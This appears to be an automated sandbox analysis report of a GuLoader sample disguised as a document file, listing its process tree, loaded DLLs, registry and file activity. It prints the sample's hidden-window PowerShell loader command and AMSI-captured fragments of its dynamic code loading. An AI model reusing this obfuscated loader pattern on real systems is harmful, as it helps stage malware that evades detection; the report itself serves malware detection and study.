Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: doc20250319-00712.bat.exe	Virustotal: Detection: 39%
Source: doc20250319-00712.bat.exe	ReversingLabs: Detection: 30%

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

File read: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\doc20250319-00712.bat.exe "C:\Users\user\Desktop\doc20250319-00712.bat.exe"
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: lanser.lnk.0.dr

LNK file: ..\Users\user\Videos\Colporteurs.far

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

File written: C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Konflikters\divorced.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: doc20250319-00712.bat.exe

Static file information: File size 1565871 > 1048576

Source:	Binary string: stem.Core.pdbU source: powershell.exe, 00000003.00000002.1776604931.00000000082EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdba source: powershell.exe, 00000003.00000002.1776604931.000000000829F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Core.pdb source: powershell.exe, 00000003.00000002.1776604931.00000000082EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbt source: powershell.exe, 00000003.00000002.1772793488.000000000732B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1776604931.000000000829F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000003.00000002.1779201822.000000000B183000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tallowed $Tragicoheroicomic $Scult), (Absinthism @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Supergalaxies = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Aztecs)), $miszoning).DefineDynamicModule($brawl, $false).DefineType($Britskas, $Allerbedstes, [System.MulticastDelegate])$Fllesraadet

Suspicious powershell command line found

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)"
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)"			Jump to behavior

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EBC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09272FE0 push 8BD38B50h; iretd	3_2_09272FE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09295F1C push ecx; ret	3_2_09295F2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_092959ED push eax; retf	3_2_092959F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_092949E4 push edi; iretd	3_2_092949E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_092937FB pushad ; ret	3_2_0929387E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09293C76 push edx; ret	3_2_09293CE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09293856 pushad ; ret	3_2_0929387E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09295EEB push ecx; ret	3_2_09295F2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09291EE4 push ebx; ret	3_2_09291EE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_09292EE7 push esp; retf	3_2_09292EEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_092964D5 push ds; iretd	3_2_092964E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C637FB pushad ; ret	12_2_03C6387E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C65F1C push ecx; ret	12_2_03C65F2A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C62EE7 push esp; retf	12_2_03C62EEE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C61EE4 push ebx; ret	12_2_03C61EE5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C65EEB push ecx; ret	12_2_03C65F2A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C649E4 push edi; iretd	12_2_03C649E6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C659ED push eax; retf	12_2_03C659F2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C664D5 push ds; iretd	12_2_03C664E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C63856 pushad ; ret	12_2_03C6387E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_03C63C76 push edx; ret	12_2_03C63CE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
